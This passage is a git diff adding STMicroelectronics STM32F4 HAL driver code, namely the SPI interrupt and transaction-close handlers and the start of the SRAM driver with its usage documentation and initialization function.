*ptmpreg8; + /* To avoid GCC warning */ + UNUSED(tmpreg8); + + /* Disable RXNE and ERR interrupt */ + __HAL_SPI_DISABLE_IT(hspi, (SPI_IT_RXNE | SPI_IT_ERR)); + + if (hspi->TxXferCount == 0U) + { + SPI_CloseRxTx_ISR(hspi); + } +} +#endif /* USE_SPI_CRC */ + +/** + * @brief Tx 8-bit handler for Transmit and Receive in Interrupt mode. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_2linesTxISR_8BIT(struct __SPI_HandleTypeDef *hspi) +{ + *(__IO uint8_t *)&hspi->Instance->DR = (*hspi->pTxBuffPtr); + hspi->pTxBuffPtr++; + hspi->TxXferCount--; + + /* Check the end of the transmission */ + if (hspi->TxXferCount == 0U) + { +#if (USE_SPI_CRC != 0U) + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + /* Set CRC Next Bit to send CRC */ + SET_BIT(hspi->Instance->CR1, SPI_CR1_CRCNEXT); + /* Disable TXE interrupt */ + __HAL_SPI_DISABLE_IT(hspi, SPI_IT_TXE); + return; + } +#endif /* USE_SPI_CRC */ + + /* Disable TXE interrupt */ + __HAL_SPI_DISABLE_IT(hspi, SPI_IT_TXE); + + if (hspi->RxXferCount == 0U) + { + SPI_CloseRxTx_ISR(hspi); + } + } +} + +/** + * @brief Rx 16-bit handler for Transmit and Receive in Interrupt mode. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_2linesRxISR_16BIT(struct __SPI_HandleTypeDef *hspi) +{ + /* Receive data in 16 Bit mode */ + *((uint16_t *)hspi->pRxBuffPtr) = (uint16_t)(hspi->Instance->DR); + hspi->pRxBuffPtr += sizeof(uint16_t); + hspi->RxXferCount--; + + if (hspi->RxXferCount == 0U) + { +#if (USE_SPI_CRC != 0U) + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + hspi->RxISR = SPI_2linesRxISR_16BITCRC; + return; + } +#endif /* USE_SPI_CRC */ + + /* Disable RXNE interrupt */ + __HAL_SPI_DISABLE_IT(hspi, SPI_IT_RXNE); + + if (hspi->TxXferCount == 0U) + { + SPI_CloseRxTx_ISR(hspi); + } + } +} + +#if (USE_SPI_CRC != 0U) +/** + * @brief Manage the CRC 16-bit receive for Transmit and Receive in Interrupt mode. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_2linesRxISR_16BITCRC(struct __SPI_HandleTypeDef *hspi) +{ + __IO uint32_t tmpreg = 0U; + + /* Read 16bit CRC to flush Data Register */ + tmpreg = READ_REG(hspi->Instance->DR); + /* To avoid GCC warning */ + UNUSED(tmpreg); + + /* Disable RXNE interrupt */ + __HAL_SPI_DISABLE_IT(hspi, SPI_IT_RXNE); + + SPI_CloseRxTx_ISR(hspi); +} +#endif /* USE_SPI_CRC */ + +/** + * @brief Tx 16-bit handler for Transmit and Receive in Interrupt mode. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_2linesTxISR_16BIT(struct __SPI_HandleTypeDef *hspi) +{ + /* Transmit data in 16 Bit mode */ + hspi->Instance->DR = *((uint16_t *)hspi->pTxBuffPtr); + hspi->pTxBuffPtr += sizeof(uint16_t); + hspi->TxXferCount--; + + /* Enable CRC Transmission */ + if (hspi->TxXferCount == 0U) + { +#if (USE_SPI_CRC != 0U) + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + /* Set CRC Next Bit to send CRC */ + SET_BIT(hspi->Instance->CR1, SPI_CR1_CRCNEXT); + /* Disable TXE interrupt */ + __HAL_SPI_DISABLE_IT(hspi, SPI_IT_TXE); + return; + } +#endif /* USE_SPI_CRC */ + + /* Disable TXE interrupt */ + __HAL_SPI_DISABLE_IT(hspi, SPI_IT_TXE); + + if (hspi->RxXferCount == 0U) + { + SPI_CloseRxTx_ISR(hspi); + } + } +} + +#if (USE_SPI_CRC != 0U) +/** + * @brief Manage the CRC 8-bit receive in Interrupt context. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_RxISR_8BITCRC(struct __SPI_HandleTypeDef *hspi) +{ + __IO uint8_t * ptmpreg8; + __IO uint8_t tmpreg8 = 0; + + /* Initialize the 8bit temporary pointer */ + ptmpreg8 = (__IO uint8_t *)&hspi->Instance->DR; + /* Read 8bit CRC to flush Data Register */ + tmpreg8 = *ptmpreg8; + /* To avoid GCC warning */ + UNUSED(tmpreg8); + + SPI_CloseRx_ISR(hspi); +} +#endif /* USE_SPI_CRC */ + +/** + * @brief Manage the receive 8-bit in Interrupt context. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_RxISR_8BIT(struct __SPI_HandleTypeDef *hspi) +{ + *hspi->pRxBuffPtr = (*(__IO uint8_t *)&hspi->Instance->DR); + hspi->pRxBuffPtr++; + hspi->RxXferCount--; + +#if (USE_SPI_CRC != 0U) + /* Enable CRC Transmission */ + if ((hspi->RxXferCount == 1U) && (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE)) + { + SET_BIT(hspi->Instance->CR1, SPI_CR1_CRCNEXT); + } +#endif /* USE_SPI_CRC */ + + if (hspi->RxXferCount == 0U) + { +#if (USE_SPI_CRC != 0U) + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + hspi->RxISR = SPI_RxISR_8BITCRC; + return; + } +#endif /* USE_SPI_CRC */ + SPI_CloseRx_ISR(hspi); + } +} + +#if (USE_SPI_CRC != 0U) +/** + * @brief Manage the CRC 16-bit receive in Interrupt context. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_RxISR_16BITCRC(struct __SPI_HandleTypeDef *hspi) +{ + __IO uint32_t tmpreg = 0U; + + /* Read 16bit CRC to flush Data Register */ + tmpreg = READ_REG(hspi->Instance->DR); + /* To avoid GCC warning */ + UNUSED(tmpreg); + + /* Disable RXNE and ERR interrupt */ + __HAL_SPI_DISABLE_IT(hspi, (SPI_IT_RXNE | SPI_IT_ERR)); + + SPI_CloseRx_ISR(hspi); +} +#endif /* USE_SPI_CRC */ + +/** + * @brief Manage the 16-bit receive in Interrupt context. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_RxISR_16BIT(struct __SPI_HandleTypeDef *hspi) +{ + *((uint16_t *)hspi->pRxBuffPtr) = (uint16_t)(hspi->Instance->DR); + hspi->pRxBuffPtr += sizeof(uint16_t); + hspi->RxXferCount--; + +#if (USE_SPI_CRC != 0U) + /* Enable CRC Transmission */ + if ((hspi->RxXferCount == 1U) && (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE)) + { + SET_BIT(hspi->Instance->CR1, SPI_CR1_CRCNEXT); + } +#endif /* USE_SPI_CRC */ + + if (hspi->RxXferCount == 0U) + { +#if (USE_SPI_CRC != 0U) + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + hspi->RxISR = SPI_RxISR_16BITCRC; + return; + } +#endif /* USE_SPI_CRC */ + SPI_CloseRx_ISR(hspi); + } +} + +/** + * @brief Handle the data 8-bit transmit in Interrupt mode. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_TxISR_8BIT(struct __SPI_HandleTypeDef *hspi) +{ + *(__IO uint8_t *)&hspi->Instance->DR = (*hspi->pTxBuffPtr); + hspi->pTxBuffPtr++; + hspi->TxXferCount--; + + if (hspi->TxXferCount == 0U) + { +#if (USE_SPI_CRC != 0U) + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + /* Enable CRC Transmission */ + SET_BIT(hspi->Instance->CR1, SPI_CR1_CRCNEXT); + } +#endif /* USE_SPI_CRC */ + SPI_CloseTx_ISR(hspi); + } +} + +/** + * @brief Handle the data 16-bit transmit in Interrupt mode. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_TxISR_16BIT(struct __SPI_HandleTypeDef *hspi) +{ + /* Transmit data in 16 Bit mode */ + hspi->Instance->DR = *((uint16_t *)hspi->pTxBuffPtr); + hspi->pTxBuffPtr += sizeof(uint16_t); + hspi->TxXferCount--; + + if (hspi->TxXferCount == 0U) + { +#if (USE_SPI_CRC != 0U) + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + /* Enable CRC Transmission */ + SET_BIT(hspi->Instance->CR1, SPI_CR1_CRCNEXT); + } +#endif /* USE_SPI_CRC */ + SPI_CloseTx_ISR(hspi); + } +} + +/** + * @brief Handle SPI Communication Timeout. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @param Flag SPI flag to check + * @param State flag state to check + * @param Timeout Timeout duration + * @param Tickstart tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef SPI_WaitFlagStateUntilTimeout(SPI_HandleTypeDef *hspi, uint32_t Flag, FlagStatus State, + uint32_t Timeout, uint32_t Tickstart) +{ + __IO uint32_t count; + uint32_t tmp_timeout; + uint32_t tmp_tickstart; + + /* Adjust Timeout value in case of end of transfer */ + tmp_timeout = Timeout - (HAL_GetTick() - Tickstart); + tmp_tickstart = HAL_GetTick(); + + /* Calculate Timeout based on a software loop to avoid blocking issue if Systick is disabled */ + count = tmp_timeout * ((SystemCoreClock * 32U) >> 20U); + + while ((__HAL_SPI_GET_FLAG(hspi, Flag) ? SET : RESET) != State) + { + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tmp_tickstart) >= tmp_timeout) || (tmp_timeout == 0U)) + { + /* Disable the SPI and reset the CRC: the CRC value should be cleared + on both master and slave sides in order to resynchronize the master + and slave for their respective CRC calculation */ + + /* Disable TXE, RXNE and ERR interrupts for the interrupt process */ + __HAL_SPI_DISABLE_IT(hspi, (SPI_IT_TXE | SPI_IT_RXNE | SPI_IT_ERR)); + + if ((hspi->Init.Mode == SPI_MODE_MASTER) && ((hspi->Init.Direction == SPI_DIRECTION_1LINE) + || (hspi->Init.Direction == SPI_DIRECTION_2LINES_RXONLY))) + { + /* Disable SPI peripheral */ + __HAL_SPI_DISABLE(hspi); + } + + /* Reset CRC Calculation */ + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + SPI_RESET_CRC(hspi); + } + + hspi->State = HAL_SPI_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hspi); + + return HAL_TIMEOUT; + } + /* If Systick is disabled or not incremented, deactivate timeout to go in disable loop procedure */ + if(count == 0U) + { + tmp_timeout = 0U; + } + count--; + } + } + + return HAL_OK; +} + +/** + * @brief Handle the check of the RX transaction complete. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @param Timeout Timeout duration + * @param Tickstart tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef SPI_EndRxTransaction(SPI_HandleTypeDef *hspi, uint32_t Timeout, uint32_t Tickstart) +{ + if ((hspi->Init.Mode == SPI_MODE_MASTER) && ((hspi->Init.Direction == SPI_DIRECTION_1LINE) + || (hspi->Init.Direction == SPI_DIRECTION_2LINES_RXONLY))) + { + /* Disable SPI peripheral */ + __HAL_SPI_DISABLE(hspi); + } + + /* Erratasheet: BSY bit may stay high at the end of a data transfer in Slave mode */ + if (hspi->Init.Mode == SPI_MODE_MASTER) + { + if (hspi->Init.Direction != SPI_DIRECTION_2LINES_RXONLY) + { + /* Control the BSY flag */ + if (SPI_WaitFlagStateUntilTimeout(hspi, SPI_FLAG_BSY, RESET, Timeout, Tickstart) != HAL_OK) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_FLAG); + return HAL_TIMEOUT; + } + } + else + { + /* Wait the RXNE reset */ + if (SPI_WaitFlagStateUntilTimeout(hspi, SPI_FLAG_RXNE, RESET, Timeout, Tickstart) != HAL_OK) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_FLAG); + return HAL_TIMEOUT; + } + } + } + else + { + /* Wait the RXNE reset */ + if (SPI_WaitFlagStateUntilTimeout(hspi, SPI_FLAG_RXNE, RESET, Timeout, Tickstart) != HAL_OK) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_FLAG); + return HAL_TIMEOUT; + } + } + return HAL_OK; +} + +/** + * @brief Handle the check of the RXTX or TX transaction complete. + * @param hspi SPI handle + * @param Timeout Timeout duration + * @param Tickstart tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef SPI_EndRxTxTransaction(SPI_HandleTypeDef *hspi, uint32_t Timeout, uint32_t Tickstart) +{ + /* Timeout in µs */ + __IO uint32_t count = SPI_BSY_FLAG_WORKAROUND_TIMEOUT * (SystemCoreClock / 24U / 1000000U); + /* Erratasheet: BSY bit may stay high at the end of a data transfer in Slave mode */ + if (hspi->Init.Mode == SPI_MODE_MASTER) + { + /* Control the BSY flag */ + if (SPI_WaitFlagStateUntilTimeout(hspi, SPI_FLAG_BSY, RESET, Timeout, Tickstart) != HAL_OK) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_FLAG); + return HAL_TIMEOUT; + } + } + else + { + /* Wait BSY flag during 1 Byte time transfer in case of Full-Duplex and Tx transfer + * If Timeout is reached, the transfer is considered as finish. + * User have to calculate the timeout value to fit with the time of 1 byte transfer. + * This time is directly link with the SPI clock from Master device. + */ + do + { + if (count == 0U) + { + break; + } + count--; + } while (__HAL_SPI_GET_FLAG(hspi, SPI_FLAG_BSY) != RESET); + } + + return HAL_OK; +} + +/** + * @brief Handle the end of the RXTX transaction. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_CloseRxTx_ISR(SPI_HandleTypeDef *hspi) +{ + uint32_t tickstart; + __IO uint32_t count = SPI_DEFAULT_TIMEOUT * (SystemCoreClock / 24U / 1000U); + + /* Init tickstart for timeout management */ + tickstart = HAL_GetTick(); + + /* Disable ERR interrupt */ + __HAL_SPI_DISABLE_IT(hspi, SPI_IT_ERR); + + /* Wait until TXE flag is set */ + do + { + if (count == 0U) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_FLAG); + break; + } + count--; + } while ((hspi->Instance->SR & SPI_FLAG_TXE) == RESET); + + /* Check the end of the transaction */ + if (SPI_EndRxTxTransaction(hspi, SPI_DEFAULT_TIMEOUT, tickstart) != HAL_OK) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_FLAG); + } + + /* Clear overrun flag in 2 Lines communication mode because received is not read */ + if (hspi->Init.Direction == SPI_DIRECTION_2LINES) + { + __HAL_SPI_CLEAR_OVRFLAG(hspi); + } + +#if (USE_SPI_CRC != 0U) + /* Check if CRC error occurred */ + if (__HAL_SPI_GET_FLAG(hspi, SPI_FLAG_CRCERR) != RESET) + { + hspi->State = HAL_SPI_STATE_READY; + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_CRC); + __HAL_SPI_CLEAR_CRCERRFLAG(hspi); + /* Call user error callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->ErrorCallback(hspi); +#else + HAL_SPI_ErrorCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ + } + else + { +#endif /* USE_SPI_CRC */ + if (hspi->ErrorCode == HAL_SPI_ERROR_NONE) + { + if (hspi->State == HAL_SPI_STATE_BUSY_RX) + { + hspi->State = HAL_SPI_STATE_READY; + /* Call user Rx complete callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->RxCpltCallback(hspi); +#else + HAL_SPI_RxCpltCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ + } + else + { + hspi->State = HAL_SPI_STATE_READY; + /* Call user TxRx complete callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->TxRxCpltCallback(hspi); +#else + HAL_SPI_TxRxCpltCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ + } + } + else + { + hspi->State = HAL_SPI_STATE_READY; + /* Call user error callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->ErrorCallback(hspi); +#else + HAL_SPI_ErrorCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ + } +#if (USE_SPI_CRC != 0U) + } +#endif /* USE_SPI_CRC */ +} + +/** + * @brief Handle the end of the RX transaction. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_CloseRx_ISR(SPI_HandleTypeDef *hspi) +{ + /* Disable RXNE and ERR interrupt */ + __HAL_SPI_DISABLE_IT(hspi, (SPI_IT_RXNE | SPI_IT_ERR)); + + /* Check the end of the transaction */ + if (SPI_EndRxTransaction(hspi, SPI_DEFAULT_TIMEOUT, HAL_GetTick()) != HAL_OK) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_FLAG); + } + + /* Clear overrun flag in 2 Lines communication mode because received is not read */ + if (hspi->Init.Direction == SPI_DIRECTION_2LINES) + { + __HAL_SPI_CLEAR_OVRFLAG(hspi); + } + hspi->State = HAL_SPI_STATE_READY; + +#if (USE_SPI_CRC != 0U) + /* Check if CRC error occurred */ + if (__HAL_SPI_GET_FLAG(hspi, SPI_FLAG_CRCERR) != RESET) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_CRC); + __HAL_SPI_CLEAR_CRCERRFLAG(hspi); + /* Call user error callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->ErrorCallback(hspi); +#else + HAL_SPI_ErrorCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ + } + else + { +#endif /* USE_SPI_CRC */ + if (hspi->ErrorCode == HAL_SPI_ERROR_NONE) + { + /* Call user Rx complete callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->RxCpltCallback(hspi); +#else + HAL_SPI_RxCpltCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ + } + else + { + /* Call user error callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->ErrorCallback(hspi); +#else + HAL_SPI_ErrorCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ + } +#if (USE_SPI_CRC != 0U) + } +#endif /* USE_SPI_CRC */ +} + +/** + * @brief Handle the end of the TX transaction. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_CloseTx_ISR(SPI_HandleTypeDef *hspi) +{ + uint32_t tickstart; + __IO uint32_t count = SPI_DEFAULT_TIMEOUT * (SystemCoreClock / 24U / 1000U); + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + /* Wait until TXE flag is set */ + do + { + if (count == 0U) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_FLAG); + break; + } + count--; + } while ((hspi->Instance->SR & SPI_FLAG_TXE) == RESET); + + /* Disable TXE and ERR interrupt */ + __HAL_SPI_DISABLE_IT(hspi, (SPI_IT_TXE | SPI_IT_ERR)); + + /* Check the end of the transaction */ + if (SPI_EndRxTxTransaction(hspi, SPI_DEFAULT_TIMEOUT, tickstart) != HAL_OK) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_FLAG); + } + + /* Clear overrun flag in 2 Lines communication mode because received is not read */ + if (hspi->Init.Direction == SPI_DIRECTION_2LINES) + { + __HAL_SPI_CLEAR_OVRFLAG(hspi); + } + + hspi->State = HAL_SPI_STATE_READY; + if (hspi->ErrorCode != HAL_SPI_ERROR_NONE) + { + /* Call user error callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->ErrorCallback(hspi); +#else + HAL_SPI_ErrorCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ + } + else + { + /* Call user Rx complete callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->TxCpltCallback(hspi); +#else + HAL_SPI_TxCpltCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ + } +} + +/** + * @brief Handle abort a Rx transaction. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_AbortRx_ISR(SPI_HandleTypeDef *hspi) +{ + __IO uint32_t tmpreg = 0U; + __IO uint32_t count = SPI_DEFAULT_TIMEOUT * (SystemCoreClock / 24U / 1000U); + + /* Wait until TXE flag is set */ + do + { + if (count == 0U) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_ABORT); + break; + } + count--; + } while ((hspi->Instance->SR & SPI_FLAG_TXE) == RESET); + + /* Disable SPI Peripheral */ + __HAL_SPI_DISABLE(hspi); + + /* Disable TXEIE, RXNEIE and ERRIE(mode fault event, overrun error, TI frame error) interrupts */ + CLEAR_BIT(hspi->Instance->CR2, (SPI_CR2_TXEIE | SPI_CR2_RXNEIE | SPI_CR2_ERRIE)); + + /* Flush Data Register by a blank read */ + tmpreg = READ_REG(hspi->Instance->DR); + /* To avoid GCC warning */ + UNUSED(tmpreg); + + hspi->State = HAL_SPI_STATE_ABORT; +} + +/** + * @brief Handle abort a Tx or Rx/Tx transaction. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_AbortTx_ISR(SPI_HandleTypeDef *hspi) +{ + /* Disable TXEIE interrupt */ + CLEAR_BIT(hspi->Instance->CR2, (SPI_CR2_TXEIE)); + + /* Disable SPI Peripheral */ + __HAL_SPI_DISABLE(hspi); + + hspi->State = HAL_SPI_STATE_ABORT; +} + +/** + * @} + */ + +#endif /* HAL_SPI_MODULE_ENABLED */ + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_sram.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_sram.c new file mode 100644 index 000000000..752056982 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_sram.c @@ -0,0 +1,912 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_sram.c + * @author MCD Application Team + * @brief SRAM HAL module driver. + * This file provides a generic firmware to drive SRAM memories + * mounted as external device. + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + This driver is a generic layered driver which contains a set of APIs used to + control SRAM memories. It uses the FMC layer functions to interface + with SRAM devices. + The following sequence should be followed to configure the FMC/FSMC to interface + with SRAM/PSRAM memories: + + (#) Declare a SRAM_HandleTypeDef handle structure, for example: + SRAM_HandleTypeDef hsram; and: + + (++) Fill the SRAM_HandleTypeDef handle "Init" field with the allowed + values of the structure member. + + (++) Fill the SRAM_HandleTypeDef handle "Instance" field with a predefined + base register instance for NOR or SRAM device + + (++) Fill the SRAM_HandleTypeDef handle "Extended" field with a predefined + base register instance for NOR or SRAM extended mode + + (#) Declare two FMC_NORSRAM_TimingTypeDef structures, for both normal and extended + mode timings; for example: + FMC_NORSRAM_TimingTypeDef Timing and FMC_NORSRAM_TimingTypeDef ExTiming; + and fill its fields with the allowed values of the structure member. + + (#) Initialize the SRAM Controller by calling the function HAL_SRAM_Init(). This function + performs the following sequence: + + (##) MSP hardware layer configuration using the function HAL_SRAM_MspInit() + (##) Control register configuration using the FMC NORSRAM interface function + FMC_NORSRAM_Init() + (##) Timing register configuration using the FMC NORSRAM interface function + FMC_NORSRAM_Timing_Init() + (##) Extended mode Timing register configuration using the FMC NORSRAM interface function + FMC_NORSRAM_Extended_Timing_Init() + (##) Enable the SRAM device using the macro __FMC_NORSRAM_ENABLE() + + (#) At this stage you can perform read/write accesses from/to the memory connected + to the NOR/SRAM Bank. You can perform either polling or DMA transfer using the + following APIs: + (++) HAL_SRAM_Read()/HAL_SRAM_Write() for polling read/write access + (++) HAL_SRAM_Read_DMA()/HAL_SRAM_Write_DMA() for DMA read/write transfer + + (#) You can also control the SRAM device by calling the control APIs HAL_SRAM_WriteOperation_Enable()/ + HAL_SRAM_WriteOperation_Disable() to respectively enable/disable the SRAM write operation + + (#) You can continuously monitor the SRAM device HAL state by calling the function + HAL_SRAM_GetState() + + *** Callback registration *** + ============================================= + [..] + The compilation define USE_HAL_SRAM_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + + Use Functions @ref HAL_SRAM_RegisterCallback() to register a user callback, + it allows to register following callbacks: + (+) MspInitCallback : SRAM MspInit. + (+) MspDeInitCallback : SRAM MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + Use function @ref HAL_SRAM_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. It allows to reset following callbacks: + (+) MspInitCallback : SRAM MspInit. + (+) MspDeInitCallback : SRAM MspDeInit. + This function) takes as parameters the HAL peripheral handle and the Callback ID. + + By default, after the @ref HAL_SRAM_Init and if the state is HAL_SRAM_STATE_RESET + all callbacks are reset to the corresponding legacy weak (surcharged) functions. + Exception done for MspInit and MspDeInit callbacks that are respectively + reset to the legacy weak (surcharged) functions in the @ref HAL_SRAM_Init + and @ref HAL_SRAM_DeInit only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the @ref HAL_SRAM_Init and @ref HAL_SRAM_DeInit + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) + + Callbacks can be registered/unregistered in READY state only. + Exception done for MspInit/MspDeInit callbacks that can be registered/unregistered + in READY or RESET state, thus registered (user) MspInit/DeInit callbacks can be used + during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using @ref HAL_SRAM_RegisterCallback before calling @ref HAL_SRAM_DeInit + or @ref HAL_SRAM_Init function. + + When The compilation define USE_HAL_SRAM_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak (surcharged) callbacks are used. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup SRAM SRAM + * @brief SRAM driver modules + * @{ + */ +#ifdef HAL_SRAM_MODULE_ENABLED + +#if defined(STM32F405xx) || defined(STM32F415xx) || defined(STM32F407xx) || defined(STM32F417xx) ||\ + defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) ||\ + defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F412Zx) ||\ + defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F413xx) || defined(STM32F423xx) + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ + +/* Exported functions --------------------------------------------------------*/ +/** @defgroup SRAM_Exported_Functions SRAM Exported Functions + * @{ + */ +/** @defgroup SRAM_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * + @verbatim + ============================================================================== + ##### SRAM Initialization and de_initialization functions ##### + ============================================================================== + [..] This section provides functions allowing to initialize/de-initialize + the SRAM memory + +@endverbatim + * @{ + */ + +/** + * @brief Performs the SRAM device initialization sequence + * @param hsram pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @param Timing Pointer to SRAM control timing structure + * @param ExtTiming Pointer to SRAM extended mode timing structure + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SRAM_Init(SRAM_HandleTypeDef *hsram, FMC_NORSRAM_TimingTypeDef *Timing, FMC_NORSRAM_TimingTypeDef *ExtTiming) +{ + /* Check the SRAM handle parameter */ + if(hsram == NULL) + { + return HAL_ERROR; + } + + if(hsram->State == HAL_SRAM_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hsram->Lock = HAL_UNLOCKED; + +#if (USE_HAL_SRAM_REGISTER_CALLBACKS == 1) + if(hsram->MspInitCallback == NULL) + { + hsram->MspInitCallback = HAL_SRAM_MspInit; + } + hsram->DmaXferCpltCallback = HAL_SRAM_DMA_XferCpltCallback; + hsram->DmaXferErrorCallback = HAL_SRAM_DMA_XferErrorCallback; + + /* Init the low level hardware */ + hsram->MspInitCallback(hsram); +#else + /* Initialize the low level hardware (MSP) */ + HAL_SRAM_MspInit(hsram); +#endif + } + + /* Initialize SRAM control Interface */ + FMC_NORSRAM_Init(hsram->Instance, &(hsram->Init)); + + /* Initialize SRAM timing Interface */ + FMC_NORSRAM_Timing_Init(hsram->Instance, Timing, hsram->Init.NSBank); + + /* Initialize SRAM extended mode timing Interface */ + FMC_NORSRAM_Extended_Timing_Init(hsram->Extended, ExtTiming, hsram->Init.NSBank, hsram->Init.ExtendedMode); + + /* Enable the NORSRAM device */ + __FMC_NORSRAM_ENABLE(hsram->Instance, hsram->Init.NSBank); + + return HAL_OK; +} + +/** + * @brief Performs the SRAM device De-initialization sequence. + * @param hsram pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @retval 